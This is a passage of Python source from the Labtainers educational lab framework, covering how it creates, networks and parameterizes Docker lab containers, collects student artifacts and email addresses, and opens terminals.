if not DockerCmd(cmd):
cmd = 'docker cp lab_sys/. %s:/' % (mycontainer_name)
#if osTypeMap[mycontainer_image_name] == 'ubuntu18':
# cmd = 'docker cp lab_sys/. %s:/' % (mycontainer_name)
#else:
# cmd = 'docker cp lab_sys/. %s:/usr/' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
logger.debug('CopyLabBin tar failed for lab_sys, explicit copy')
if mycontainer_image_name in osTypeMap and osTypeMap[mycontainer_image_name] == 'ubuntu20':
cmd = 'docker exec %s script -q -c "sed -i \'s/env python/env python3/\' /usr/sbin/mynotify.py"' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed changing mynotify to python3: %s' % cmd)
exit(1)
# Copy Students' Artifacts from host to instructor's lab container
def CopyStudentArtifacts(labtainer_config, mycontainer_name, labname, container_user, container_password):
# Set the lab name
command = 'docker exec %s script -q -c "echo %s > /home/%s/.local/.labname" /dev/null' % (mycontainer_name, labname, container_user)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call CopyStudentArtifacts set labname is %s (1=>FAILURE)" % result)
if result == FAILURE:
logger.error("Failed to set labname in container %s!\n" % mycontainer_name)
sys.exit(1)
# Create is_grade_container
command = 'docker exec %s script -q -c "echo TRUE > /home/%s/.local/.is_grade_container" /dev/null' % (mycontainer_name, container_user)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call CopyStudentArtifacts create is_grade_container is %s (1=>FAILURE)" % result)
if result == FAILURE:
logger.error("Failed to create is_grade_container in container %s!\n" % mycontainer_name)
sys.exit(1)
username = getpass.getuser()
xfer_dir = os.path.join(labtainer_config.host_home_xfer, labname)
zip_filelist = glob.glob('/home/%s/%s/*.zip' % (username, xfer_dir))
lab_filelist = glob.glob('/home/%s/%s/*.lab' % (username, xfer_dir))
zip_filelist.extend(lab_filelist)
logger.debug("filenames is (%s)" % zip_filelist)
# Copy zip files from 'Shared' folder to 'home/$CONTAINER_USER'
for fname in zip_filelist:
logger.debug("name is %s" % fname)
base_fname = os.path.basename(fname)
# Copy zip file
command = 'docker cp %s %s:/home/%s/' % (fname, mycontainer_name, container_user)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.call CopyStudentArtifacts copy zipfile (%s) is %s (1=>FAILURE)" % (fname, result))
if result == FAILURE:
logger.error("Failed to copy student artifacts into container %s!\n" % mycontainer_name)
sys.exit(1)
#command = 'docker exec %s echo "%s\n" | sudo -S chown %s:%s /home/%s/%s' % (mycontainer_name, container_password,
# container_user, container_user, container_user, base_fname)
#command = 'docker exec %s chown %s:%s /home/%s/%s' % (mycontainer_name,
# container_user, container_user, container_user, base_fname)
#logger.debug("Command to execute is (%s)" % command)
#result = subprocess.call(command, shell=True)
#logger.debug("Result of subprocess.call CopyStudentArtifacts copy zipfile (%s) is %s" % (fname, result))
#if result == FAILURE:
# logger.error("Failed to set labname in container %s!\n" % mycontainer_name)
# sys.exit(1)
def GetRunningContainersList():
cmd = "docker container ls --format {{.Names}}"
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8').strip()) > 0:
logger.debug('No running containers: error returned %s, return false' % output[1].decode('utf-8'))
return False, None
result = output[0].decode('utf-8').strip()
logger.debug('result is %s' % result)
if 'Error:' in result or len(result.strip()) == 0:
if 'Error:' in result:
logger.debug("Command was (%s)" % cmd)
logger.debug("Error from command = '%s'" % result)
return False, result
containers_list = result.split('\n')
return True, containers_list
def GetRunningLabNames(containers_list):
labnameslist = []
found_lab_role = False
for each_container in containers_list:
#print each_container
if each_container.endswith('.student'):
splitstring = each_container.split('.')
labname = splitstring[0]
found_lab_role = True
if labname not in labnameslist:
labnameslist.append(labname)
return found_lab_role, labnameslist
class ImageInfo():
def __init__(self, name, creation, user, local, local_build, version, use_tag):
self.name = name
self.creation = creation
self.user = user
self.local = local
''' whether a locally built image '''
self.local_build = local_build
self.version = None
self.use_tag = use_tag
if version is not None:
version = version.replace('"', '')
if version != 'null' and len(version.strip()) > 0:
try:
self.version = version
except:
logger.error('failed getting version from string <%s>' % version)
traceback.print_exc()
traceback.print_stack()
exit(1)
def inspectImage(image_name):
created = None
user = None
version = None
cmd = "docker inspect -f '{{.Created}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
created = output[0].decode('utf-8').strip()
cmd = "docker inspect -f '{{.Config.User}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
user = output[0].decode('utf-8').strip()
cmd = "docker inspect --format='{{json .Config.Labels.version}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
version = output[0].decode('utf-8').strip()
return created, user, version
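# Illustrative return values (image name is hypothetical): inspectImage('mylab.client')
# might yield ('2021-07-01T12:00:00Z', 'ubuntu', '"1"'); any field is None when
# the corresponding docker inspect query produces no output.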
def imageInfo(image_name, registry, base_registry, labtainer_config, is_rebuild=False, no_pull=False, quiet=False, local_build=False):
''' image_name lacks registry info (always)
First look if plain image name exists, suggesting
an ongoing build/test situation '''
retval = None
use_tag = 'latest'
created, user, version = inspectImage(image_name)
if created is not None:
retval = ImageInfo(image_name, created, user, True, True, version, use_tag)
logger.debug('%s local built, ts %s %s' % (image_name, created, user))
else:
''' next see if there is a local image from the desired registry '''
with_registry = '%s/%s' % (registry, image_name)
created, user, version = inspectImage(with_registry)
if created is not None:
retval = ImageInfo(with_registry, created, user, True, False, version, use_tag)
logger.debug('%s local from reg, ts %s %s version: %s' % (with_registry, created, user, version))
elif not local_build:
''' See if the image exists in the desired registry '''
reg_host = None
if ':' in labtainer_config.test_registry:
reg_host = labtainer_config.test_registry.split(':')[0]
logger.debug('imageInfo reg_host: %s registry: %s' % (reg_host, registry))
if reg_host is not None and registry.startswith(reg_host):
created, user, version, use_tag, base = InspectLocalReg.inspectLocal(image_name, logger,
registry, is_rebuild=is_rebuild, quiet=quiet, no_pull=no_pull)
else:
created, user, version, use_tag = InspectRemoteReg.inspectRemote(with_registry, logger,
is_rebuild=is_rebuild, quiet=quiet, no_pull=no_pull, base_registry=base_registry)
if created is None and not is_rebuild:
if not InspectRemoteReg.reachDockerHub():
logger.error('Unable to reach DockerHub. \nIs the network functional?\n')
if created is not None:
logger.debug('%s only on registry %s, ts %s %s version %s use_tag %s' % (with_registry, registry, created, user, version, use_tag))
retval = ImageInfo(with_registry, created, user, False, False, version, use_tag)
if retval is None:
logger.debug('%s not found local_build was %r' % (image_name, local_build))
return retval
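# Resolution order used above: (1) a plain local image name (an in-progress build),
# (2) a local image tagged with the requested registry, (3) the registry itself
# (local test registry or a remote registry such as Docker Hub); None if no match.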
def GetBothConfigs(lab_path, logger, servers=None, clone_count=None):
labtainer_config_dir = os.path.join(os.path.dirname(os.path.dirname(lab_path)), 'config', 'labtainer.config')
labtainer_config = ParseLabtainerConfig.ParseLabtainerConfig(labtainer_config_dir, logger)
labname = os.path.basename(lab_path)
config_path = os.path.join(lab_path,"config")
start_config_path = os.path.join(config_path,"start.config")
start_config = ParseStartConfig.ParseStartConfig(start_config_path, labname,
labtainer_config, logger, servers=servers, clone_count=clone_count)
return labtainer_config, start_config
def pullDockerImage(registry, image_name):
image = '%s/%s' % (registry, image_name)
return dockerPull.pull(image)
'''
cmd = 'docker pull %s/%s' % (registry, image_name)
logger.debug('%s' % cmd)
print('pulling %s from %s' % (image_name, registry))
ps = subprocess.Popen(shlex.split(cmd), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
output = ps.communicate()
if len(output[1]) > 0:
return False
print('Done with pull')
return True
'''
def defineAdditionalIP(container_name, post_start_if, post_start_nets):
for subnet in post_start_nets:
existing_ip = post_start_if[subnet]
cmd = "docker exec %s bash -c 'ifconfig'" % (container_name)
logger.debug('cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug('out0 %s \nout1 %s' % (output[0].decode('utf-8'), output[1].decode('utf-8')))
current_if = None
this_if = None
for line in output[0].decode('utf-8').splitlines():
parts = line.split()
if len(parts) < 2:
continue
if parts[1] == 'Link':
current_if = parts[0]
elif parts[1] == ('addr:%s' % post_start_if[subnet]):
this_if = current_if
break
count = 1
for ip in post_start_nets[subnet]:
cmd = "docker exec %s bash -c 'ifconfig %s:%d %s'" % (container_name, this_if, count, ip)
logger.debug('next cmd is %s' % cmd)
if not DockerCmd(cmd):
print('error doing %s' % cmd)
exit(1)
count += 1
def MakeNetMap(start_config, mycontainer_name, container_user):
''' filter docker network list to include only tapped lans, and append MAC to each line '''
cmd = "docker network ls"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
nlist = []
for subnet in start_config.subnets:
if start_config.subnets[subnet].tap == 'yes':
nlist.append(subnet)
if len(output[1].strip()) == 0:
with open('/tmp/net_map.txt', 'w') as fh:
''' for each network reported by docker '''
for line in output[0].decode('utf-8').splitlines():
parts = line.split()
net = parts[1]
eth = 'br-%s' % parts[0]
''' find if it matches a tapped subnet in this lab '''
for subnet in nlist:
if subnet == net:
                        ''' NOTE mac is no longer used, include for compatibility. Remove later '''
mac = get_hw_address(eth)
new_line = '%s %s\n' % (line, mac)
fh.write(new_line)
break
cmd = 'docker cp /tmp/net_map.txt %s:/var/tmp/' % (mycontainer_name)
DockerCmd(cmd)
def WaitForTap(start_config):
retval = True
tap_dir = GetWaitTapDir()
tap_lock = os.path.join(tap_dir,'lock')
fail_at = 40
while not os.path.isdir(tap_lock):
fail_at = fail_at - 1
if fail_at <= 0:
retval = False
logger.error('tap lock dir not created at %s, exiting' % tap_lock)
log_path = os.path.join(os.getenv('LABTAINER_DIR'), 'logs', 'start_labdump.log')
tap = FindTap(start_config)
if tap is None:
logger.error('No component with TAP attribute')
break
cmd = 'docker cp %s:/var/log/start_labdump.log %s' % (tap, log_path)
if not DockerCmd(cmd):
logger.error('failed to copy start_labdump.log')
break
logger.debug('tap dir does not yet exist')
time.sleep(1)
return retval
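# Note: the loop above polls for roughly 40 seconds for the tap component to
# create its lock directory before giving up and copying out that container's
# start_labdump log for diagnosis.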
def DoStartOne(labname, name, container, start_config, labtainer_config, lab_path,
student_email, quiet_start, results, auto_grade, image_info):
retval = True
mycontainer_name = container.full_name
mycontainer_image_name = container.image_name
container_user = container.user
container_password = container.password
    ''' manage interfaces with multiple IP addresses, which docker does not support directly '''
post_start_if = {}
post_start_nets = {}
haveContainer = AllContainersCreated(container)
logger.debug("DoStart for %s AllContainersCreated result (%s)" % (container.name, haveContainer))
display = os.getenv('DISPLAY')
    if display is not None and ':' in display:
display = display.split(':')[1]
display_num = int(float(display))
else:
logger.error('could not get display number from %s' % os.getenv('DISPLAY'))
return
# Set need_seeds=False first
need_seeds=False
    # IsContainerCreated returns False if the container does not exist
if not haveContainer:
# Container does not exist, create the container
# Use CreateSingleContainer()
containerCreated = False
if len(container.container_nets) == 0 or container.tap == 'yes':
containerCreated = CreateSingleContainer(labtainer_config, start_config, container, lab_path, quiet=quiet_start)
else:
#mysubnet_name, mysubnet_ip = container.container_nets.popitem()
mysubnet_name = next(iter(container.container_nets))
mysubnet_ip = container.container_nets[mysubnet_name]
container.did_net(mysubnet_name)
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
post_start_if[subnet_name] = mysubnet_ip
containerCreated = CreateSingleContainer(labtainer_config, start_config, container, lab_path,
mysubnet_name=subnet_name, mysubnet_ip=mysubnet_ip, quiet=quiet_start)
logger.debug("CreateSingleContainer %s result (%s)" % (mycontainer_name, containerCreated))
if not containerCreated:
logger.error("CreateSingleContainer fails to create container %s!\n" % mycontainer_name)
results.append(False)
return
# Give the container some time -- just in case
#time.sleep(3)
# If we just create it, then set need_seeds=True
need_seeds=True
# Check again -
haveContainer = AllContainersCreated(container)
logger.debug("AllContainersCreated second check for %s result (%s)" % (container.name, haveContainer))
        # IsContainerCreated returns False if the container does not exist
if not haveContainer:
logger.error("Container %s still not created!\n" % mycontainer_name)
results.append(False)
return
num_containers = len(start_config.containers.items())
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
wait_for_tap = False
for mysubnet_name, mysubnet_ip in container.container_nets.items():
if start_config.subnets[mysubnet_name].tap:
wait_for_tap = True
if mysubnet_name in container.did_nets:
continue
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
if subnet_name not in post_start_nets:
post_start_nets[subnet_name] = []
if subnet_name not in post_start_if:
post_start_if[subnet_name] = mysubnet_ip
#logger.debug('container: %s assigned post_start_if[%s] %s, connecting' % (mycontainer_name, subnet_name, mysubnet_ip))
connectNetworkResult = ConnectNetworkToContainer(start_config, mycontainer_name, subnet_name, mysubnet_ip)
else:
post_start_nets[subnet_name].append(mysubnet_ip)
else:
connectNetworkResult = ConnectNetworkToContainer(start_config, mycontainer_name, mysubnet_name, mysubnet_ip)
if wait_for_tap:
if not WaitForTap(start_config):
results.append(False)
return
# Start the container
if not StartMyContainer(mycontainer_name):
logger.error("Container %s failed to start!\n" % mycontainer_name)
results.append(False)
return
defineAdditionalIP(mycontainer_name, post_start_if, post_start_nets)
if container.x11.lower() == 'yes':
''' Avoid problems caused by container wiping out all of /tmp on startup '''
cmd = "docker exec %s bash -c 'mkdir -p /var/tmp/.X11-unix'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
results.append(False)
return
count = 0
cmd = "docker exec %s bash -c 'ln -s /var/tmp/.X11-unix/X%d /tmp/.X11-unix/X%d'" % (mycontainer_name,
display_num, display_num)
while not DockerCmd(cmd, noloop=True, good_error='File exists') and count<5:
time.sleep(1)
count += 1
if count >= 5:
logger.error('failed %s' % cmd)
results.append(False)
return
clone_need_seeds = need_seeds
if not clone_need_seeds:
cmd = "docker exec %s bash -c 'ls -l /var/labtainer/did_param'" % (mycontainer_name)
if not DockerCmd(cmd):
print('One or more containers exists but are not parameterized.')
print('Please restart this lab with the "-r" option.')
DoStop(start_config, labtainer_config, lab_path, False)
logger.error('One or more containers exists but not parameterized.')
results.append(False)
return
# If the container is just created, then use the previous user's e-mail
# then parameterize the container
elif quiet_start and clone_need_seeds:
ParamForStudent(start_config.lab_master_seed, mycontainer_name, container,
labname, student_email, lab_path, name, image_info, num_containers)
elif clone_need_seeds:
ParamForStudent(start_config.lab_master_seed, mycontainer_name, container,
labname, student_email, lab_path, name, image_info, num_containers)
if container.no_gw:
cmd = "docker exec %s bash -c 'sudo /bin/ip route del 0/0'" % (mycontainer_name)
DockerCmd(cmd)
cmd = "docker exec %s bash -c 'sudo route del default'" % (mycontainer_name)
DockerCmd(cmd)
if container.no_resolve:
cmd = "docker exec %s bash -c 'sudo echo \"\" > /etc/resolv.conf'" % (mycontainer_name)
DockerCmd(cmd)
if container.tap == 'yes':
MakeNetMap(start_config, mycontainer_name, container_user)
if container.lab_gateway is not None:
cmd = "docker exec %s bash -c 'sudo /usr/bin/set_default_gw.sh %s'" % (mycontainer_name,
container.lab_gateway)
DockerCmd(cmd, good_error='SIOCDELRT: No such process')
#DockerCmd(cmd)
'''
ignore error. TBD filter errors due to my_host not being set
if not DockerCmd(cmd):
logger.error('Fatal error in docker command %s' % cmd)
results.append(False)
return
'''
cmd = "docker exec %s bash -c 'sudo route del my_host'" % (mycontainer_name)
#DockerCmd(cmd)
DockerCmd(cmd, good_error='SIOCDELRT: No such process')
if container.name_server is not None:
cmd = "docker exec %s bash -c 'echo \"nameserver %s\" | sudo tee /etc/resolv.conf'" % (mycontainer_name,
container.name_server)
if not DockerCmd(cmd):
logger.error('Fatal error in docker command %s' % cmd)
results.append(False)
return
results.append(retval)
def GetUserEmail(quiet_start):
user_email = None
while user_email is None:
done = True
# Prompt user for e-mail address
eprompt = '\nPlease enter your e-mail address: '
prev_email = getLastEmail()
if prev_email is not None:
eprompt = eprompt+" [%s]" % prev_email
#checks if quiet_start is true
if quiet_start and prev_email is not None:
user_email = prev_email
else:
if sys.version_info >=(3,0):
user_input = input(eprompt)
else:
user_input = raw_input(eprompt)
if not all(c in string.printable for c in user_input):
print('Bad characters detected. Please re-enter email')
elif '"' in user_input or "'" in user_input:
print('No quotes allowed. Please re-enter email')
else:
user_email = user_input
if user_email is not None:
#user_email = input(eprompt)
if len(user_email.strip()) == 0:
if prev_email is None:
print('You have provided an empty email address, which may cause your results to not be graded.')
if sys.version_info >=(3,0):
confirm = str(input('Use the empty address? (y/n)')).lower().strip()
else:
confirm = str(raw_input('Use the empty address? (y/n)')).lower().strip()
if confirm != 'y':
user_email = None
else:
user_email = prev_email
else:
putLastEmail(user_email)
return user_email
def CheckLabContainerApps(start_config, lab_path, apps2start):
apps2search = ['firefox', 'wireshark']
has_multi_container = False
num_containers = len(start_config.containers.items())
if num_containers > 1:
has_multi_container = True
apps2startfilepath = os.path.join(lab_path, '*/_bin', 'student_startup.sh')
apps2start_list = glob.glob('%s' % apps2startfilepath)
if apps2start_list != []:
# Parse each student_startup.sh - get a list of apps to start
# Currently only search for firefox or wireshark
for eachfile in apps2start_list:
with open(eachfile) as fh:
for line in fh:
if line.startswith('#') or len(line) == 0:
continue
for apps in apps2search:
if apps in line:
if apps not in apps2start:
apps2start.append(apps)
return has_multi_container
def ReloadStartConfig(lab_path, labtainer_config, start_config, student_email, logger, servers, clone_count):
labname = os.path.basename(lab_path)
my_start_config = os.path.join('./.tmp',labname, 'start.config')
if not os.path.isfile(my_start_config):
config_path = os.path.join(lab_path,"config")
start_config_path = os.path.join(config_path,"start.config")
param_path = os.path.join(config_path,"parameter.config")
try:
os.makedirs(os.path.dirname(my_start_config))
except os.error:
pass
shutil.copyfile(start_config_path, my_start_config)
lab_instance_seed = GetLabSeed(start_config.lab_master_seed, student_email)
logger.debug("lab_instance_seed for <%s> <%s> is %s" % (start_config.lab_master_seed, student_email, lab_instance_seed))
pp = ParameterParser.ParameterParser(None, None, lab_instance_seed, logger, lab=labname)
pp.ParseParameterConfig(param_path)
pp.DoReplace()
start_config = ParseStartConfig.ParseStartConfig(my_start_config, labname, labtainer_config, logger, skip_networks=False,
servers=servers, clone_count=clone_count)
logger.debug('did start.config reload from %s' % my_start_config)
return start_config
def CheckEmailReloadStartConfig(start_config, quiet_start, lab_path, labtainer_config, logger, servers, clone_count):
student_email = None
for name, container in start_config.containers.items():
# Obscure means of making sure we have an email and getting one if
# a container has not yet been created.
if not AllContainersCreated(container) and student_email is None:
if student_email == None:
student_email = GetUserEmail(quiet_start)
else:
student_email = GetUserEmail(True)
if student_email == None:
student_email = GetUserEmail(True)
start_config = ReloadStartConfig(lab_path, labtainer_config, start_config, student_email, logger, servers, clone_count)
return start_config, student_email
def pidExists(pid):
"""Check whether pid exists in the current process table.
UNIX only.
"""
if pid <= 0:
return False
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
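# Illustrative usage: pidExists(os.getpid()) is True for the running process;
# it is used below to poll whether a spawned xterm is still alive.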
def ContainerTerminals(lab_path, start_config, container, terminal_count, terminal_groups, container_map):
num_terminal = int(container.terminals)
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
#logger.debug("container: %s Number of terminals: %d" % (mycontainer_name, num_terminal))
if mycontainer_name in container_map:
#logger.debug('container %s mapped to %s' % (mycontainer_name, container_map[mycontainer_name]))
mycontainer_name = container_map[mycontainer_name]
CopyFilesToHost(lab_path, container.name, mycontainer_name, container.user)
''' HACK remove after a while.... catch case where framework updated to remove XTERM Instructions, but still using image
that includes instructions, which then consumes a window '''
#if container.xterm is None:
# cmd = "docker exec %s bash -c 'ls -l $HOME/instructions.txt'" % (mycontainer_name)
# if DockerCmd(cmd, noloop=True):
# logger.debug('Found instructions, force xterm')
# container.xterm = 'instructions'
if container.xterm is not None:
logger.debug('container.xterm is <%s>' % container.xterm)
parts = container.xterm.split()
title = parts[0]
command = None
#if title.lower() == 'instructions' and len(parts) == 1:
# command = 'startup.sh'
if len(parts) == 2:
command = parts[1]
else:
                logger.error("Bad XTERM entry in start.config: %s" % container.xterm)
exit(1)
if command is not None:
cmd = 'sh -c "cd /home/%s && .local/bin/%s"' % (container.user, command)
terminal_location, columns, lines = terminalCounter(terminal_count)
terminal_count += 1
# note hack to change --geometry to -geometry
spawn_command = "xterm %s -title %s -sb -rightbar -fa 'Monospace' -fs 11 -e docker exec -it %s %s & 2>/tmp/xterm.out" % (terminal_location[1:],
title, mycontainer_name, cmd)
logger.debug("xterm spawn: %s" % spawn_command)
xterm_pid = subprocess.Popen(shlex.split(spawn_command), stdout=subprocess.PIPE,stderr=subprocess.PIPE, close_fds=True).pid
# race condition, gnome may beat xterm to the startup.sh script
if command == 'startup.sh':
done = False
while pidExists(xterm_pid) and not done:
cmd = 'docker exec -it %s ls -l /tmp/.mylockdir' % mycontainer_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if 'No such file or directory' not in output[0].decode('utf-8'):
done = True
else:
time.sleep(0.2)
# If the number of terminals is -1 or zero -- do not spawn
#print('container terms %s is %d' % (mycontainer_name, num_terminal))
if not (num_terminal == 0 or num_terminal == -1):
for x in range(num_terminal):
#sys.stderr.write("%d \n" % terminal_count)
terminal_location, columns, lines = terminalCounter(terminal_count)
#sys.stderr.write("%s \n" % terminal_location)
#sys.stderr.write("%s \n" % mycontainer_name)
cmd = 'bash -l -c bash'
#spawn_command = "gnome-terminal %s -x docker exec -it %s bash -l &" % (terminal_location, mycontainer_name)
if container.terminal_group is not None:
if container.terminal_group not in terminal_groups:
terminal_count += 1
terminal_groups[container.terminal_group] = []
group_command = '"docker exec -it %s %s"' % (mycontainer_name, cmd)
terminal_groups[container.terminal_group].append(group_command)
else:
terminal_count += 1
spawn_command = 'gnome-terminal %s --profile=labtainers -- docker exec -it --env COLUMNS=%d --env LINES=%d %s %s >/dev/null 2>&1 &' % (terminal_location,
columns, lines, mycontainer_name, cmd)
logger.debug("gnome spawn: %s" % spawn_command)
#print spawn_command
os.system(spawn_command)
return terminal_count
def SkipContainer(run_container, name, start_config, servers):
container = start_config.containers[name]
if run_container is not None and container.full_name != run_container:
return True
if servers is not None:
if servers == 'server':
if container.client == 'yes':
return True
elif servers == 'client':
if container.client != 'yes':
return True
return False
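# Note (added for clarity): SkipContainer() returns True when a container should be left alone,
# either because a single run_container was requested and this is not it, or because the lab is
# split across 'server'/'client' hosts and this container belongs to the other role.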
def readFirst(lab_path, labname, fname, quiet_start, bail_option=False):
#
    # If fname exists in the lab's docs directory, display it before the student continues.
#
doc_dir = os.path.join(lab_path, 'docs')
read_first = os.path.join(doc_dir, fname)
pdf = '%s.pdf' % labname
manual = os.path.join(doc_dir, pdf)
if os.path.isfile(read_first):
print('\n\n')
command = 'cat %s' % read_first
less = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
sed_cmd = "sed -e s+LAB_MANUAL+%s+ -e s+LAB_DOCS+%s+" % (manual, doc_dir)
sed = subprocess.Popen(sed_cmd.split(), stdin=less.stdout, stdout=subprocess.PIPE)
output = sed.communicate()[0].decode('utf-8')
print(output)
if not quiet_start:
less.wait()
if not bail_option:
if sys.version_info >=(3,0):
dumb = input("Press <enter> to start the lab\n")
else:
dumb = raw_input("Press <enter> to start the lab\n")
else:
if sys.version_info >=(3,0):
dumb = input("Continue? (y/n)")
else:
dumb = raw_input("Continue? (y/n)")
if dumb.lower() != 'y':
cmd = 'rm -fr .tmp/%s' % labname
os.system(cmd)
print('Exiting lab')
exit(0)
def DoTerminals(start_config, lab_path, run_container=None, servers=None, container_map={}):
# spawn terminal for each container based on num_terminal
terminal_count = 0
terminal_groups = {}
for name, container in start_config.containers.items():
# Do not spawn terminal if it is regression testing
if SkipContainer(run_container, name, start_config, servers):
            logger.debug('DoTerminals skipping container %s' % name)
continue
terminal_count = ContainerTerminals(lab_path, start_config, container, terminal_count, terminal_groups, container_map)
for tg in terminal_groups:
tab_commands = ''
tab = '--window'
for command in terminal_groups[tg]:
tab_commands = tab_commands+' %s -e %s' % (tab, command)
tab = '--tab'
#tab_commands = tab_commands+' --tab %s --' % command
terminal_location, columns, lines = terminalCounter(terminal_count)
terminal_count += 1
spawn_command = 'gnome-terminal %s --profile=labtainers %s >/dev/null 2>&1' % (terminal_location, tab_commands)
FNULL = open(os.devnull, 'w')
result = subprocess.Popen(shlex.split(spawn_command), close_fds=True, stdout=FNULL, stderr=subprocess.STDOUT)
logger.debug("gnome spawn tg: %s" % spawn_command)
#os.system(spawn_command)
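# Note (added for clarity): containers that share a terminal_group are opened above as tabs of a
# single gnome-terminal window (the first command gets --window, subsequent ones --tab) instead
# of one window per container.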
def GetWaitTapDir():
user = os.getenv('USER')
wait_tap_dir = os.path.join('/tmp', user, 'wait_tap_dir')
return wait_tap_dir
def GetStartSyncDir():
user = os.getenv('USER')
sync_dir = os.path.join('/tmp', user, 'labtainer_sync')
return sync_dir
def CountStartSync():
sync_dir = GetStartSyncDir()
dlist = os.listdir(sync_dir)
return len(dlist)
def ClearStartSync():
sync_dir = GetStartSyncDir()
shutil.rmtree(sync_dir, ignore_errors=True)
try:
os.makedirs(sync_dir)
except os.error:
logger.error("did not expect to find dir %s" % sync_dir)
def WaitStartSync(container):
wait_dir = os.path.join(GetStartSyncDir(), container)
while not os.path.isdir(wait_dir):
time.sleep(1)
def CreateStartSync(container):
my_dir = os.path.join(GetStartSyncDir(), container)
try:
os.makedirs(my_dir)
except os.error:
logger.error("did not expect to find dir %s" % my_dir)
def DoStart(start_config, labtainer_config, lab_path,
quiet_start, run_container, servers, clone_count, auto_grade=False, debug_grade=False, container_images=None):
labname = os.path.basename(lab_path)
logger.debug("DoStart Multiple Containers and/or multi-home networking")
''' make sure root can access Xserver '''
SetXhost()
apps2start = []
has_multi_container = CheckLabContainerApps(start_config, lab_path, apps2start)
logger.debug("Apps to start is (%s)" % apps2start)
hostSystem_script = os.path.join(lab_path, '*/_bin', 'hostSystemCheck.py')
hostSystemCheckList = glob.glob('%s' % hostSystem_script)
logger.debug("List of hostSystemCheck.py (%s)" % hostSystemCheckList)
# If more than one hostSystemCheck.py - pick first one
if hostSystemCheckList != [] and os.path.isfile(hostSystemCheckList[0]):
# Do Host System Check if necessary (if file exists)
command = "%s" % hostSystemCheckList[0]
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE)
if result == FAILURE:
logger.warning("Host System Check indicates error encountered")
if sys.version_info >=(3,0):
user_input=input("Would you like to quit? (yes/no)\n")
else:
user_input=raw_input("Would you like to quit? (yes/no)\n")
user_input=user_input.strip().lower()
#print "user_input (%s)" % user_input
if user_input == "yes":
sys.exit(1)
# Create SUBNETS
if CreateSubnets(start_config):
''' don't create tapped containers until tap is ready '''
tap_lock_dir = GetWaitTapDir()
lock = os.path.join(tap_lock_dir, 'lock')
try:
os.rmdir(lock)
except:
pass
try:
os.makedirs(tap_lock_dir)
except:
pass
ClearStartSync()
student_email = None
threads = []
results = []
if has_multi_container:
container_warning_printed = False
start_config, student_email = CheckEmailReloadStartConfig(start_config, quiet_start, lab_path,
labtainer_config, logger, servers, clone_count)
for name, container in start_config.containers.items():
if SkipContainer(run_container, name, start_config, servers):
#print('gonna skip %s' % run_container)
continue
if has_multi_container and container_warning_printed == False:
print("Starting the lab, this may take a moment...")
container_warning_printed = True
image_info = None
if container_images is not None:
logger.debug('container images not none,get for %s' % name)
image_info = container_images[name]
logger.debug('container images got image_info %s' % image_info)
if image_info is None:
print('is none, map is %s' % str(container_images))
t = threading.Thread(target=DoStartOne, args=(labname, name, container, start_config, labtainer_config, lab_path,
student_email, quiet_start, results, auto_grade, image_info))
threads.append(t)
t.setName(name)
t.start()
logger.debug('started all')
progress = 'Started %d containers, %d completed initialization, please wait...\n' % (len(threads), 0)
sys.stdout.write(progress)
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
dockerPull.moveUp(1)
progress = 'Started %d containers, %d completed initialization. Done.\n' % (len(threads), len(threads))
dockerPull.clearLine()
sys.stdout.write(progress)
if False in results:
DoStop(start_config, labtainer_config, lab_path, False, run_container, servers)
logger.error('DoStartOne has at least one failure!')
sys.exit(1)
readFirst(lab_path, labname, 'read_first.txt', quiet_start)
DoTerminals(start_config, lab_path, run_container=run_container, servers=servers)
if apps2start != [] and not auto_grade:
print("Please wait for the apps (%s) to launch" % apps2start)
syncdir = os.path.join(os.getenv('LABTAINER_DIR'), 'scripts','labtainer-student', '.tmp', labname, 'sync')
logger.debug('syncdir %s' % syncdir)
try:
os.mkdir(syncdir)
except:
pass
logger.debug('Labtainer lab %s started and ready' % labname)
return 0
def terminalCounter(terminal_count):
columns = 100
lines = 25
x_coordinate = columns + ( 50 * terminal_count )
y_coordinate = 75 + ( 50 * terminal_count)
terminal_location = "--geometry %dx%d+%d+%d" % (columns, lines, x_coordinate, y_coordinate)
return terminal_location, columns, lines
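# Worked example (illustrative): for terminal_count == 2, terminalCounter() computes
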